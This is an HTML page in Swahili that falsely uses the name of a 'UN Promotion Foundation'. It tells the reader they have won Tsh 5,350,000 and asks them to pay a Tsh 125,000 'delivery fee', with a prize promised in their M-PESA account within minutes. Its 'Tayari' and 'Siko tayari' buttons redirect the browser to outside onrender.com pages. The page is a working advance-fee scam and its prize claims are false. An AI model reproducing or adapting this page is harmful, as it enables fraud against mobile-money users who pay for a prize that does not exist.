<!DOCTYPE html>
<html>

<head>
    <title>UN PROMOTION FOUNDATION - Hongera!</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            text-align: center;
        }

        h1,
        h2 {
            margin-bottom: 20px;
        }

        p {
            font-size: 1.2em;
            line-height: 1.5;
        }

        button {
            background-color: #4CAF50;
            /* Green */
            border: none;
            color: white;
            padding: 15px 32px;
            text-align: center;
            text-decoration: none;
            display: inline-block;
            font-size: 16px;
            margin: 4px 2px;
            cursor: pointer;
        }

        button:hover {
            background-color: #3e8e41;
            /* Darker green */
        }
    </style>
</head>

<body>
    <h1>HONGERA!!!</h1>
    <h2>Ada ya usajili imepokelewa na tuzo yako imetolewa kwa nambari yako ya simu kwa mafanikio</h2>
    <p>Uko katika njia nzuri ya Tuzo yako. Tafadhali lipa ada ya utoaji ya Tsh.125,000.00 ili kutoa tuzo yako ya
        Tsh.5,350,000.00.</p>
    <h2>Zawadi Yako itaakisi katika akaunti yako ya MPESA ndani ya mabano ya dakika 5. Asante</h2>
  
        <button onclick="redirect()">Tayari </button>
    <button onclick="unredirect()">Siko tayari </button>
    <script>
    function redirect(){
    window.parent.location.href = "https://page8-t6q5.onrender.com/";
    }
    </script>
      <script>
    function unredirect(){
    window.parent.location.href = "https://homepage-l9av.onrender.com/";
    }
    </script>
</body>

</html>
